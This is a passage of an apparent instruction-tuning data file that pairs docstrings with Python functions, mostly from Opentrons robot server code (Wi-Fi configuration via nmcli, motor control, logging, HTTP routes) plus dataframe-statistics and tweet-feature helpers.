cfg.value_table.enable: + value_counts = srs.value_counts(sort=False) + data["nuniq"] = value_counts.shape[0] + data["value_table"] = value_counts.nlargest(cfg.value_table.ngroups) + elif cfg.stats.enable: + data["nuniq"] = srs.nunique_approx() + return data +[INST] Parse a categorical column of text data into words, then compute +the frequency distribution of words and the total number of words.. [/INST] def _calc_word_freq( + df: dd.DataFrame, + top_words: int, + stopword: bool, + lemmatize: bool, + stem: bool, +) -> Dict[str, Any]: + col = df.columns[0] + regex = fr"\b(?:{'|'.join(ess)})\b|[^\w+ ]" if stopword else r"[^\w+ ]" + df[col] = df[col].str.replace(regex, "").str.lower().str.split() + df = df.explode(col) + if lemmatize or stem: + df[col] = df[col].dropna() + if lemmatize: + df[col] = df[col].apply(WordNetLemmatizer().lemmatize, meta=object) + if stem: + df[col] = df[col].apply(PorterStemmer().stem, meta=object) + word_cnts = df.groupby(col)[df.columns[1]].sum() + nwords = word_cnts.sum() + nuniq_words = word_cnts.shape[0] + fnl_word_cnts = word_cnts.nlargest(top_words) + return {"word_cnts": fnl_word_cnts, "nwords": nwords, "nuniq_words": nuniq_words} +[INST] Calculate statistics for a nominal column. 
[/INST] def _calc_nom_stats( + srs: dd.Series, + df: dd.DataFrame, + nrows: int, + nuniq: dd.core.Scalar, +) -> Dict[str, Any]: + stats = { + "nrows": nrows, + "npres": srs.shape[0], + "nuniq": nuniq, + "mem_use": srs.memory_usage(deep=True), + "first_rows": srs.reset_index(drop=True).loc[:4], + } + leng = { + "Mean": srs.str.len().mean(), + "Standard Deviation": srs.str.len().std(), + "Median": srs.str.len().quantile(0.5), + "Minimum": srs.str.len().min(), + "Maximum": srs.str.len().max(), + } + grp, col = df.columns + lc_cnt = (df[grp].str.count(r"[a-z]") * df[col]).sum() + uc_cnt = (df[grp].str.count(r"[A-Z]") * df[col]).sum() + letter = { + "Count": lc_cnt + uc_cnt, + "Lowercase Letter": lc_cnt, + "Space Separator": (df[grp].str.count(r"[ ]") * df[col]).sum(), + "Uppercase Letter": uc_cnt, + "Dash Punctuation": (df[grp].str.count(r"[-]") * df[col]).sum(), + "Decimal Number": (df[grp].str.count(r"[0-9]") * df[col]).sum(), + } + return {"stats": stats, "len_stats": leng, "letter_stats": letter} +[INST] Calculate stats from a datetime column. [/INST] def calc_stats_dt(srs: dd.Series) -> Dict[str, str]: + size = srs.shape[0] + count = srs.count() + try: + uniq_count = srs.nunique_approx() + except: + uniq_count = srs.nunique() + overview_dict = { + "Distinct Count": uniq_count, + "Approximate Unique (%)": uniq_count / count, + "Missing": size - count, + "Missing (%)": 1 - (count / size), + "Memory Size": srs.memory_usage(deep=True), + "Minimum": srs.min(), + "Maximum": srs.max(), + } + return overview_dict +[INST] This function apply clean functions on input dataset.. [/INST] def clean_data() -> Any: + info = request.get_json() + clean_func = info["clean_func"] + col = info["col"] + global index_df + df_cleaned = clean_function_dic[clean_func](index_df, column=col, inplace=True) + df_cleaned = df_cleaned.astype(str) + col_names = df_cleaned.columns.values.tolist() + table_columns = [] + for col_name in col_names: + temp_dic = {} + temp_dic["colName"] = col_name + temp_dic["colLabel"] = col_name + temp_dic["colWidth"] = 180 + table_columns.append(temp_dic) + transposed_json = df_cleaned.T.to_dict() + table_data = [] + for key in transposed_json: + table_data.append(transposed_json[key]) + index_df = df_cleaned + return {"tableData": table_data, "tableColumns": table_columns} +[INST] @return return a list containing all the extension of the implemented data structures. [/INST] def extensions_generator(): + extensions = [] + for dse in impl_data_structure: + ds_source = glob.glob("cy_alg/{}.pyx".format(dse.py_name)) + ds_source += glob.glob("c_alg/src/{}.c".format(dse.c_name)) + if dse.other_src: + for src in dse.other_src: + ds_source += glob.glob(src) + extension = Extension( + dse.py_name, + sources=ds_source, + include_dirs=inc_dirs, + library_dirs=lib_dirs, + libraries=libs, + ) + extensions.append(extension) + return extensions +[INST] Takes a not-yet-processed tweet in the form of [word1, word2, ..., wordn] +Returns a list of manual features adapted from ../resource/2872427.2883062.pdf + +length of comment in tokens +average length of word +number of periods, question marks, quotes, and exclamation marks +number of one letter tokens +number of capitalized letters +number of non-alpha characters. 
[/INST] def extract_manual_features(tweet): + length = len(tweet) + averageWordLength = sum([len(word) for word in tweet])//length + oneLetter = sum([1 for word in tweet if len(word) == 1]) + tweet = " ".join(tweet) + punctuationCount = 0 + for each in [".","?","\"","\'","!"]: + punctuationCount += tweet.count(each) + capitalized = 0 + nonAlpha = 0 + for each in tweet: + if each.isupper(): + capitalized += 1 + if not each.isalpha() and each != " ": + nonAlpha += 1 + manual_features = [length, averageWordLength, oneLetter, punctuationCount, capitalized, nonAlpha] + return manual_features +[INST] Takes a file with each line being one word +Returns a list of lowercase word. [/INST] def process_words(words): + wordList = [] + for word in words: + wordList.append(word.strip().lower()) + return wordList +[INST] Takes a list of processed tweets +Returns a feature matrix +See detailed comments below. [/INST] def generate_matrix(tweets, words): + wordsLentgh = len(words) + featureMatrix = [] + for tweet in tweets: + featureVector = [0] * wordsLentgh + for i in range(wordsLentgh): + featureVector[i] = tweet[2].count(words[i]) + featureVector.extend(tweet[3]) + featureVector.append(tweet[4]) + featureMatrix.append(featureVector) + return featureMatrix +[INST] put_object +object storage service file upload. [/INST] def put_object(bucketName, objectName, content): + signer = oci.auth.signers.get_resource_principals_signer() + client = oci.object_storage.ObjectStorageClient(config={}, signer=signer) + namespace = client.get_namespace().data + output="" + try: + object = client.put_object(namespace, bucketName, objectName, content) + output = "Success: Put object '" + objectName + "' in bucket '" + bucketName + "'" + except Exception as e: + output = "Failed: " + str(e.message) + return { "state": output } +[INST] shell_exec +invoke the shell to run a local command. [/INST] def shell_exec(exec_command, exec_count): + p_response = Popen([exec_command], + shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True + ) + output, errors = p_response.communicate() + logging.info("Popen Output " + str(exec_count) + ": " + output) + logging.info("Popen Errors " + str(exec_count) + ": " + errors) + return +[INST] Reads from socket until all messages from the list are received +Returns the list of messages read. [/INST] async def read_until(socket, messages): + messages = messages.copy() + res = [] + while messages: + data = await socket.receive_json() + res += [data] + if data in messages: + messages.remove(data) + return res +[INST] Set flow rate in uL/mm, to value obtained from command's params, +or if unspecified in command params, then from protocol's "default-values".. [/INST] def _set_flow_rate( + pipette_model, pipette, command_type, params, default_values): + default_aspirate = default_values.get( + 'aspirate-flow-rate', {}).get(pipette_model) + default_dispense = default_values.get( + 'dispense-flow-rate', {}).get(pipette_model) + flow_rate_param = params.get('flow-rate') + if flow_rate_param is not None: + if command_type == 'aspirate': + pipette.set_flow_rate( + aspirate=flow_rate_param, + dispense=default_dispense) + return + if command_type == 'dispense': + pipette.set_flow_rate( + aspirate=default_aspirate, + dispense=flow_rate_param) + return + pipette.set_flow_rate( + aspirate=default_aspirate, + dispense=default_dispense + ) +[INST] This is the (somewhat) synchronous method to use to do a restart. +It actually starts a thread that does the restart. 
`__wait_and_restart`, +on the other hand, should not be called directly, because it will block +until the system restarts.. [/INST] def do_restart(): + Thread(target=__wait_and_restart).start() +[INST] Delay and then execute the restart. Do not call directly.. [/INST] def __wait_and_restart(): + log.info('Restarting server') + sleep(1) + loop = asyncio.new_event_loop() + loop.run_until_complete(_resin_supervisor_restart()) +[INST] Execute a container restart by requesting it from the supervisor. +Note that failures here are returned but most likely will not be +sent back to the caller, since this is run in a separate workthread. +If the system is not responding, look for these log messages.. [/INST] async def _resin_supervisor_restart(): + supervisor = os.environ.get('RESIN_SUPERVISOR_ADDRESS', + 'http://127.0.0.1:48484') + restart_url = supervisor + '/v1/restart' + api = os.environ.get('RESIN_SUPERVISOR_API_KEY', 'unknown') + app_id = os.environ.get('RESIN_APP_ID', 'unknown') + async with aiohttp.ClientSession() as session: + async with session.post(restart_url, + params={'apikey': api}, + json={'appId': app_id, + 'force': True}) as resp: + body = await resp.read() + if resp.status != 202: + log.error("Could not shut down: {}: {}" + .format(resp.status, body)) +[INST] Returns OK, then waits approximately 1 second and restarts container. [/INST] async def restart(request): + do_restart() + return web.json_response({"message": "restarting"}) +[INST] List the visible (broadcasting SSID) wireless networks. +Returns a list of the SSIDs. They may contain spaces and should be escaped +if later passed to a shell.. [/INST] async def available_ssids(): + fields = ['ssid', 'signal', 'active'] + cmd = ['--terse', + '--fields', + ','.join(fields), + 'device', + 'wifi', + 'list'] + out, _ = await _call(cmd) + return _dict_from_terse_tabular( + fields, out, + transformers={'signal': lambda s: int(s) if s.isdigit() else None, + 'active': lambda s: s.lower() == 'yes'}) +[INST] Return the list of configured connections. +This is all connections that nmcli knows about and manages. +Each connection is a dict containing some basic information - the +information retrievable from nmcli connection show. Further information +should be queried on a connection by connection basis. + +If for_type is not None, it should be a str containing an element of +CONNECTION_TYPES, and results will be limited to that connection type.. [/INST] async def connections(for_type=None): + fields = ['name', 'type', 'active'] + res, _ = await _call(['-t', '-f', ','.join(fields), 'connection', 'show']) + found = _dict_from_terse_tabular( + fields, + res, + transformers={'type': lambda s: s.split('-')[-1], + 'active': lambda s: s.lower() == 'yes'} + ) + if for_type is not None: + if for_type not in CONNECTION_TYPES: + raise ValueError('typename {} not in valid connections types {}' + .format(for_type, CONNECTION_TYPES)) + should_return = [] + for c in found: + if c['type'] == for_type: + should_return.append(c) + return should_return + else: + return found +[INST] If there is already a connection for this ssid, return the name of +the connection; if there is not, return None.. 
[/INST] async def connection_exists(ssid): + nmcli_conns = await connections() + for wifi in [c['name'] + for c in nmcli_conns if c['type'] == 'wireless']: + res, _ = await _call(['-t', '-f', '802-11-wireless.ssid', + '-m', 'tabular', + 'connection', 'show', wifi]) + if res == ssid: + return wifi + return None +[INST] Delete all connections of con_type but the one specified.. [/INST] async def _trim_old_connections(new_name, con_type): + existing_cons = await connections(for_type=con_type) + not_us = [c['name'] for c in existing_cons if c['name'] != new_name] + ok = True + res = [] + for c in not_us: + this_ok, remove_res = await remove(name=c) + ok = ok and this_ok + if not this_ok: + log.warning("Could not remove wifi connection {}: {}" + .format(c, remove_res)) + res.append(remove_res) + else: + log.debug("Removed old wifi connection {}".format(c)) + return ok, ';'.join(res) +[INST] Configure a connection but do not bring it up (though it is configured +for autoconnect). + + + +Only anticipated failures are treated that way - for instance, an ssid +that doesn't exist will get a False and a message; a system where nmcli +is not found will raise a CalledProcessError. + +The ssid is mandatory. If security_type is 'wpa-psk', the psk must be +specified; if security_type is 'none', the psk will be ignored. + +If security_type is not specified, it will be inferred from the specified +arguments.. [/INST] async def configure(ssid, + security_type=None, + psk=None, + hidden=False, + up_retries=3): + if None is security_type and None is not psk: + security_type = 'wpa-psk' + if security_type and security_type not in SUPPORTED_SECURITY_TYPES: + message = 'Only security types {} are supported'\ + .format(SUPPORTED_SECURITY_TYPES) + log.error("Specified security type <{}> is not supported" + .format(security_type)) + return False, message + already = await connection_exists(ssid) + if already: + _1, _2 = await _call(['connection', 'delete', already]) + configure_cmd = ['connection', 'add', + 'save', 'yes', + 'autoconnect', 'yes', + 'ifname', 'wlan0', + 'type', 'wifi', + 'con-name', ssid, + 'wifi.ssid', ssid] + if security_type: + configure_cmd += ['wifi-sec.key-mgmt', security_type] + if psk: + configure_cmd += ['wifi-sec.psk', psk] + if hidden: + configure_cmd += ['wifi.hidden', 'true'] + res, err = await _call(configure_cmd) + uuid_matches = re.search( + "Connection '(.*)'[\s]+\(([\w\d-]+)\) successfully", res) + if not uuid_matches: + return False, err.split('\r')[-1] + name = uuid_matches.group(1) + uuid = uuid_matches.group(2) + for _ in range(up_retries): + res, err = await _call(['connection', 'up', 'uuid', uuid]) + if 'Connection successfully activated' in res: + _1, _2 = await _trim_old_connections(name, 'wireless') + return True, res + else: + return False, err.split('\r')[-1] +[INST] Remove a network. Depending on what is known, specify either ssid +(in which case this function will call ``connection_exists`` to get the +nmcli connection name) or the nmcli connection name directly. + +Returns (True, msg) if the connection was deleted, (False, msg) otherwise.. [/INST] async def remove(ssid=None, name=None) -> (bool, str): + if None is not ssid: + name = await connection_exists(ssid) + if None is not name: + res, err = await _call(['connection', 'delete', name]) + if 'successfully deleted' in res: + return True, res + else: + return False, err + else: + return False, 'No connection for ssid {}'.format(ssid) +[INST] Get the basic network configuration of an interface. 
+ +which_iface should be a string in IFACE_NAMES.. [/INST] async def iface_info(which_iface): + if which_iface not in IFACE_NAMES: + raise ValueError('Bad interface name {}, not in {}' + .format(which_iface, IFACE_NAMES)) + default_res = {'ipAddress': None, + 'macAddress': None, + 'gatewayAddress': None} + fields = ['GENERAL.HWADDR', 'IP4.ADDRESS', 'IP4.GATEWAY', 'GENERAL.STATE'] + res, err = await _call(['--mode', 'tabular', + '--escape', 'no', + '--terse', '--fields', ','.join(fields), + 'dev', 'show', which_iface]) + values = res.split('\n') + if len(fields) != len(values): + raise ValueError("Bad result from nmcli: {}".format(err)) + default_res['macAddress'] = values[0] + default_res['ipAddress'] = values[1] + default_res['gatewayAddress'] = values[2] + return default_res +[INST] Runs the command in a subprocess and returns the captured stdout output.. [/INST] async def _call(cmd) -> (str, str): + to_exec = [quote(c) for c in ['nmcli'] + cmd] + cmd_str = ' '.join(to_exec) + proc = await as_subprocess.create_subprocess_shell( + cmd_str, + stdout=as_subprocess.PIPE, stderr=as_subprocess.PIPE) + out, err = await proc.communicate() + out_str, err_str = out.decode().strip(), err.decode().strip() + sanitized = sanitize_args(to_exec) + log.debug('{}: stdout={}'.format(' '.join(sanitized), out_str)) + if err_str: + log.info('{}: stderr={}'.format(' '.join(sanitized), err_str)) + return out_str, err_str +[INST] Filter the command so that it no longer contains passwords. [/INST] def sanitize_args(cmd) -> (str, str): + sanitized = [] + for idx, fieldname in enumerate(cmd): + if idx > 0 and 'wifi-sec.psk' in cmd[idx-1]: + sanitized.append('****') + else: + sanitized.append(fieldname) + return sanitized +[INST] Parse NMCLI terse tabular output into a list of Python dict. +``names`` is a list of strings of field names to apply to the input data, +which is assumed to be colon separated. + +``inp`` is the input as a string (already decoded) from nmcli + +``transformers`` is a dict mapping field names to callables of the form +f: str -> any. If a fieldname is in transformers, that callable will be +invoked on the field matching the name and the result stored. + +The return value is a list with one element per valid line of input, where +each element is a dict with keys taken from names and values from the input. [/INST] def _dict_from_terse_tabular(names, inp, transformers={}): + res = [] + for n in names: + if n not in transformers: + transformers[n] = lambda s: s + for line in inp.split('\n'): + if len(line) < 3: + continue + fields = line.split(':') + res.append(dict([ + (elem[0], transformers[elem[0]](elem[1])) + for elem in zip(names, fields)])) + return res +[INST] Unmount and remove the sqlite database (used in robot reset). [/INST] def reset(): + if os.path.exists(database_path): + os.remove(database_path) + journal_path = database_path + '-journal' + if os.path.exists(journal_path): + os.remove(journal_path) +[INST] Get request will return a list of discovered ssids.. [/INST] async def list_networks(request): + res = {"list": []} + try: + networks = await nmcli.available_ssids() + except subprocess.CalledProcessError as e: + res = "CalledProcessError: {}".format(e.stdout) + status = 500 + except FileNotFoundError as e: + res = "FileNotFoundError: {}".format(e) + status = 500 + else: + res["list"] = networks + status = 200 + return web.json_response(res, status=status) +[INST] Post request should include a json body specifying config information +.
Robot will attempt to connect to this network and respond +with Ok if successful or an error code if not. + +Fields in the body are: +ssid: str Required. The SSID to connect to.. [/INST] async def configure(request): + result = {} + try: + body = await request.json() + ssid = body.get('ssid') + psk = body.get('psk') + hidden = body.get('hidden') + security = body.get('security_type') + if ssid is None: + status = 400 + message = 'Error: "ssid" string is required' + else: + ok, message = await nmcli.configure(ssid, + security_type=security, + psk=psk, + hidden=hidden) + status = 201 if ok else 401 + result['ssid'] = ssid + except json.JSONDecodeError as e: + log.debug("Error: JSONDecodeError in /wifi/configure: {}".format(e)) + status = 400 + message = e.msg + except Exception as e: + log.warning("Error: {} in /wifi/configure': {}".format(type(e), e)) + status = 500 + message = 'An unexpected error occurred.' + result['message'] = message + log.debug("Wifi configure result: {}".format(result)) + return web.json_response(data=result, status=status) +[INST] Get request will return the status of the wifi connection from the +RaspberryPi to the internet. + +The body of the response is a json dict containing. [/INST] async def status(request): + connectivity = {'status': 'none', + 'ipAddress': None, + 'macAddress': 'unknown', + 'gatewayAddress': None} + try: + connectivity['status'] = await nmcli.is_connected() + net_info = await nmcli.iface_info('wlan0') + connectivity.update(net_info) + log.debug("Connectivity: {}".format(connectivity['status'])) + status = 200 + except subprocess.CalledProcessError as e: + log.error("CalledProcessError: {}".format(e.stdout)) + status = 500 + except FileNotFoundError as e: + log.error("FileNotFoundError: {}".format(e)) + status = 500 + return web.json_response(connectivity, status=status) +[INST] Avahi Server Version Check, return avahi version string, eg.. [/INST] def GetVersion(self): + try: + return self.server.GetVersionString() + except dbus.DBusException: + return None +[INST] Return hostname according to the Avahi server. [/INST] def GetHostName(self): + try: + return self.server.GetHostName() + except dbus.DBusException: + return None +[INST] Return hostname according to the Avahi server. [/INST] def GetDomainName(self): + try: + return self.server.GetDomainName() + except dbus.DBusException: + return None +[INST] Return a new entry group for services. [/INST] def EntryGroupNew(self): + try: + return self.server.EntryGroupNew() + except dbus.DBusException: + return None +[INST] Execute a reset of the requested parts of the user configuration.. 
[/INST] async def reset(request: web.Request) -> web.Response: + data = await request.json() + for requested_reset in data.keys(): + if requested_reset not in [opt['id'] + for opt in _settings_reset_options]: + log.error('Bad reset option {} requested'.format(requested_reset)) + return web.json_response( + {'message': '{} is not a valid reset option' + .format(requested_reset)}, + status=400) + log.info("Reset requested for {}".format(', '.join(data.keys()))) + if data.get('deckCalibration'): + rc.clear(calibration=True, robot=False) + if data.get('tipProbe'): + config = rc.load() + config.tip_length.clear() + rc.save_robot_settings(config) + if data.get('labwareCalibration'): + db.reset() + if data.get('bootScripts'): + if os.environ.get('RUNNING_ON_PI'): + if os.path.exists('/data/boot.d'): + shutil.rmtree('/data/boot.d') + else: + log.debug('Not on pi, not removing /data/boot.d') + return web.json_response({}, status=200) +[INST] Moves the robot to the specified position as provided by the `control.info` +endpoint response. [/INST] async def move(request): + req = await request.text() + data = json.loads(req) + target, point, mount, model, message, error = _validate_move_data(data) + if error: + status = 400 + else: + status = 200 + if target == 'mount': + message = _move_mount(mount, point) + elif target == 'pipette': + pipette, _ = _fetch_or_create_pipette(mount, model) + pipette.move_to((robot.deck, point), strategy='arc') + new_position = tuple( + pose_tracker.absolute(pipette.robot.poses, pipette)) + message = "Move complete. New position: {}".format(new_position) + return web.json_response({"message": message}, status=status) +[INST] This initializes a call to pipette.home() which, as a side effect will: +1. Check the pipette is actually connected (will throw an error if you +try to home a non-connected pipette) +2. Re-engages the motor. [/INST] async def home(request): + req = await request.text() + data = json.loads(req) + target = data.get('target') + if target in ['robot', 'pipette']: + if target == 'robot': + robot.home() + status = 200 + message = "Homing robot." + else: + mount = data.get('mount') + if mount in ['left', 'right']: + pipette, should_remove = _fetch_or_create_pipette(mount) + pipette.home() + if should_remove: + robot.remove_instrument(mount) + status = 200 + message = "Pipette on {} homed successfully.".format(mount) + else: + status = 400 + message = "Expected 'left' or 'right' as values for mount" \ + "got {} instead.".format(mount) + else: + status = 400 + message = "Expected 'robot' or 'pipette' got {}.".format(target) + return web.json_response({"message": message}, status=status) +[INST] Reads in an attached pipette's UUID +The UUID is unique to this pipette, and is a string of unknown length + +String (str) with value 'left' or 'right'. [/INST] def read_pipette_id(self, mount): + if self.simulating: + res = '1234567890' + else: + res = self._read_from_pipette(GCODES['READ_INSTRUMENT_ID'], mount) + if res: + ret = {'pipette_id': res} + else: + ret = {'message': 'Error: Pipette ID read failed'} + return ret +[INST] Reads an attached pipette's MODEL +The MODEL is a unique string for this model of pipette + +:return model string, or None. 
[/INST] def read_pipette_model(self, mount): + if self.simulating: + res = None + else: + res = self._read_from_pipette( + GCODES['READ_INSTRUMENT_MODEL'], mount) + if res and '_v' not in res: + res = res + '_v1' + elif res and '_v13' in res: + res = res.replace('_v13', '_v1.3') + return res +[INST] Submit a GCODE command to the robot, followed by M400 to block until +done. This method also ensures that any command on the B or C axis +(the axes for plunger control) does current ramp-up and ramp-down, so +that plunger motors rest at a low current to prevent burn-out. + +In the case of a limit-switch alarm during any command other than home, +the robot should home the axis from the alarm and then raise a +SmoothieError. The robot should *not* recover and continue to run the +protocol, as this could result in unpredictable handling of liquids. +When a SmoothieError is raised, the user should inspect the physical +configuration of the robot and the protocol and determine why the limit +switch was hit unexpectedly. This is usually due to an undetected +collision in a previous move command.. [/INST] def _send_command(self, command, timeout=DEFAULT_SMOOTHIE_TIMEOUT): + if self.simulating: + return + command_line = command + ' ' + SMOOTHIE_COMMAND_TERMINATOR + ret_code = self._recursive_write_and_return( + command_line, timeout, DEFAULT_COMMAND_RETRIES) + ret_code = self._remove_unwanted_characters(command_line, ret_code) + if (ERROR_KEYWORD in ret_code.lower()) or \ + (ALARM_KEYWORD in ret_code.lower()): + self._reset_from_error() + error_axis = ret_code.strip()[-1] + if GCODES['HOME'] not in command and error_axis in 'XYZABC': + self.home(error_axis) + raise SmoothieError(ret_code) + return ret_code.strip() +[INST] Read from an attached pipette's internal memory. The gcode used +determines which portion of memory is read and returned. + +All motors must be disengaged to consistently read over I2C lines. [/INST] def _read_from_pipette(self, gcode, mount): + allowed_mounts = {'left': 'L', 'right': 'R'} + mount = allowed_mounts.get(mount) + if not mount: + raise ValueError('Unexpected mount: {}'.format(mount)) + try: + self.disengage_axis('BC') + self.delay(CURRENT_CHANGE_DELAY) + res = self._send_command(gcode + mount) + if res: + res = _parse_instrument_data(res) + assert mount in res + return _byte_array_to_ascii_string(res[mount]) + except (ParseError, AssertionError, SmoothieError): + pass +[INST] Move to the `target` Smoothieware coordinate, along any of the six +axes, XYZABC. + +dict +dict setting the coordinate that Smoothieware will be at when +`move()` returns. `target` keys are the axis in upper-case, and the +values are the coordinate in millimeters (float) + +boolean (default=False) +If set to `True`, each axis included within the target coordinate +may be homed before moving, determined by Smoothieware's internal +homing-status flags (`True` means it has already homed). All axes' +flags are set to `False` by Smoothieware under three conditions: +1) Smoothieware boots or resets, 2) if a HALT gcode or signal +is sent, or 3) a homing/limitswitch error occurred..
[/INST] def move(self, target, home_flagged_axes=False): + from numpy import isclose + self.run_flag.wait() + def valid_movement(coords, axis): + return not ( + (axis in DISABLE_AXES) or + (coords is None) or + isclose(coords, self.position[axis]) + ) + def create_coords_list(coords_dict): + return [ + axis + str(round(coords, GCODE_ROUNDING_PRECISION)) + for axis, coords in sorted(coords_dict.items()) + if valid_movement(coords, axis) + ] + backlash_target = target.copy() + backlash_target.update({ + axis: value + PLUNGER_BACKLASH_MM + for axis, value in sorted(target.items()) + if axis in 'BC' and self.position[axis] < value + }) + target_coords = create_coords_list(target) + backlash_coords = create_coords_list(backlash_target) + if target_coords: + non_moving_axes = ''.join([ + ax + for ax in AXES + if ax not in target.keys() + ]) + self.dwell_axes(non_moving_axes) + self.activate_axes(target.keys()) + command = self._generate_current_command() + if backlash_coords != target_coords: + command += ' ' + GCODES['MOVE'] + ''.join(backlash_coords) + command += ' ' + GCODES['MOVE'] + ''.join(target_coords) + try: + for axis in target.keys(): + self.engaged_axes[axis] = True + if home_flagged_axes: + self.home_flagged_axes(''.join(list(target.keys()))) + log.debug("move: {}".format(command)) + self._send_command(command, timeout=DEFAULT_MOVEMENT_TIMEOUT) + finally: + plunger_axis_moved = ''.join(set('BC') & set(target.keys())) + if plunger_axis_moved: + self.dwell_axes(plunger_axis_moved) + self._set_saved_current() + self._update_position(target) +[INST] In order to terminate Smoothie motion immediately (including +interrupting a command in progress, we set the reset pin low and then +back to high, then call `_setup` method to send the RESET_FROM_ERROR +Smoothie code to return Smoothie to a normal waiting state and reset +any other state needed for the driver.. [/INST] def kill(self): + log.debug("kill") + self._smoothie_hard_halt() + self._reset_from_error() + self._setup() +[INST] Function that sets log levels and format strings. Checks for the +OT_LOG_LEVEL environment variable otherwise defaults to DEBUG.. [/INST] def log_init(): + fallback_log_level = 'INFO' + ot_log_level = robot.config.log_level + if ot_log_level not in logging._nameToLevel: + log.info("OT Log Level {} not found. 
Defaulting to {}".format( + ot_log_level, fallback_log_level)) + ot_log_level = fallback_log_level + level_value = logging._nameToLevel[ot_log_level] + serial_log_filename = environment.get_path('SERIAL_LOG_FILE') + api_log_filename = environment.get_path('LOG_FILE') + logging_config = dict( + version=1, + formatters={ + 'basic': { + 'format': + '%(asctime)s %(name)s %(levelname)s [Line %(lineno)s] %(message)s' + } + }, + handlers={ + 'debug': { + 'class': 'logging.StreamHandler', + 'formatter': 'basic', + 'level': level_value + }, + 'serial': { + 'class': 'logging.handlers.RotatingFileHandler', + 'formatter': 'basic', + 'filename': serial_log_filename, + 'maxBytes': 5000000, + 'level': logging.DEBUG, + 'backupCount': 3 + }, + 'api': { + 'class': 'logging.handlers.RotatingFileHandler', + 'formatter': 'basic', + 'filename': api_log_filename, + 'maxBytes': 1000000, + 'level': logging.DEBUG, + 'backupCount': 5 + } + }, + loggers={ + '__main__': { + 'handlers': ['debug', 'api'], + 'level': logging.INFO + }, + 'opentrons.server': { + 'handlers': ['debug', 'api'], + 'level': level_value + }, + 'opentrons.api': { + 'handlers': ['debug', 'api'], + 'level': level_value + }, + 'opentrons.instruments': { + 'handlers': ['debug', 'api'], + 'level': level_value + }, + 'opentrons.robot.robot_configs': { + 'handlers': ['debug', 'api'], + 'level': level_value + }, + 'opentrons.drivers.smoothie_drivers.driver_3_0': { + 'handlers': ['debug', 'api'], + 'level': level_value + }, + 'opentrons.drivers.serial_communication': { + 'handlers': ['serial'], + 'level': logging.DEBUG + }, + 'opentrons.system': { + 'handlers': ['debug', 'api'], + 'level': level_value + } + } + ) + dictConfig(logging_config) +[INST] Builds an application including the RPC server, and also configures HTTP +routes for methods defined in opentrons.server.endpoints. 
[/INST] def init(loop=None): + server = Server(MainRouter(), loop=loop, middlewares=[error_middleware]) + server.app.router.add_get( + '/health', endp.health) + server.app.router.add_get( + '/wifi/list', wifi.list_networks) + server.app.router.add_post( + '/wifi/configure', wifi.configure) + server.app.router.add_get( + '/wifi/status', wifi.status) + server.app.router.add_post( + '/identify', control.identify) + server.app.router.add_get( + '/modules', control.get_attached_modules) + server.app.router.add_get( + '/modules/{serial}/data', control.get_module_data) + server.app.router.add_post( + '/camera/picture', control.take_picture) + server.app.router.add_post( + '/server/update', endpoints.update_api) + server.app.router.add_post( + '/server/update/firmware', endpoints.update_firmware) + server.app.router.add_get( + '/server/update/ignore', endpoints.get_ignore_version) + server.app.router.add_post( + '/server/update/ignore', endpoints.set_ignore_version) + server.app.router.add_static( + '/logs', log_file_path, show_index=True) + server.app.router.add_post( + '/server/restart', endpoints.restart) + server.app.router.add_post( + '/calibration/deck/start', dc_endp.start) + server.app.router.add_post( + '/calibration/deck', dc_endp.dispatch) + server.app.router.add_get( + '/pipettes', control.get_attached_pipettes) + server.app.router.add_get( + '/motors/engaged', control.get_engaged_axes) + server.app.router.add_post( + '/motors/disengage', control.disengage_axes) + server.app.router.add_get( + '/robot/positions', control.position_info) + server.app.router.add_post( + '/robot/move', control.move) + server.app.router.add_post( + '/robot/home', control.home) + server.app.router.add_get( + '/robot/lights', control.get_rail_lights) + server.app.router.add_post( + '/robot/lights', control.set_rail_lights) + server.app.router.add_get( + '/settings', settings.get_advanced_settings) + server.app.router.add_post( + '/settings', settings.set_advanced_setting) + server.app.router.add_post( + '/settings/reset', settings.reset) + server.app.router.add_get( + '/settings/reset/options', settings.available_resets) + return server.app +[INST] This application creates and starts the server for both the RPC routes +handled by opentrons.server.rpc and HTTP endpoints defined here. [/INST] def main(): + log_init() + arg_parser = ArgumentParser( + description="Opentrons application server", + prog="opentrons.server.main" + ) + arg_parser.add_argument( + "-H", "--hostname", + help="TCP/IP hostname to serve on (default: %(default)r)", + default="localhost" + ) + arg_parser.add_argument( + "-P", "--port", + help="TCP/IP port to serve on (default: %(default)r)", + type=int, + default="8080" + ) + arg_parser.add_argument( + "-U", "--path", + help="Unix file system path to serve on. 
Specifying a path will cause " + "hostname and port arguments to be ignored.", + ) + args, _ = arg_parser.parse_known_args(sys.argv[1:]) + if args.path: + log.debug("Starting Opentrons server application on {}".format( + args.path)) + else: + log.debug("Starting Opentrons server application on {}:{}".format( + args.hostname, args.port)) + try: + robot.connect() + except Exception as e: + log.exception("Error while connecting to motor-driver: {}".format(e)) + log.info("API server version: {}".format(__version__)) + log.info("Smoothie FW version: {}".format(robot.fw_version)) + if not ff.disable_home_on_boot(): + log.info("Homing Z axes") + robot.home_z() + if not os.environ.get("ENABLE_VIRTUAL_SMOOTHIE"): + setup_udev_rules_file() + unlock_resin_updates() + web.run_app(init(), host=args.hostname, port=args.port, path=args.path) + arg_parser.exit(message="Stopped\n") +[INST] Build a fake minor package and return its path. [/INST] def build_pkg(package_name, version, in_dir=None): + if not in_dir: + td = tempfile.mkdtemp() + in_dir = os.path.join(td, package_name) + os.mkdir(in_dir) + test_setup = """ +from setuptools import setup +setup(name='{0}', +version='{1}', +description='Test package', +url='http://github.com/Opentrons/opentrons', +author='Opentrons', +author_email='test@example.com', +license='Apache 2.0', +packages=['{0}'], +zip_safe=False) +""".format(package_name, version) + test_setup_file = os.path.join(in_dir, 'setup.py') + with open(test_setup_file, 'w') as tsf: + tsf.write(test_setup) + src_dir = os.path.join(in_dir, package_name) + try: + os.mkdir(src_dir) + except FileExistsError: + pass + test_code = """ +print("all ok")' +""" + test_file = os.path.join(src_dir, '__init__.py') + with open(test_file, 'w') as tf: + tf.write(test_code) + cmd = '{} setup.py bdist_wheel'.format(sys.executable) + subprocess.run(cmd, cwd=in_dir, shell=True) + return os.path.join( + in_dir, 'dist', + '{}-{}-py3-none-any.whl'.format(package_name, version)) +[INST] Calculate axis position for a given liquid volume. +Translates the passed liquid volume to absolute coordinates +on the axis associated with this pipette. + +Calibration of the pipette motor's ul-to-mm conversion is required. [/INST] def _aspirate_plunger_position(self, ul): + model = self.name + if self.ul_per_mm: + ul_per_mm = lambda: self.ul_per_mm + else: + 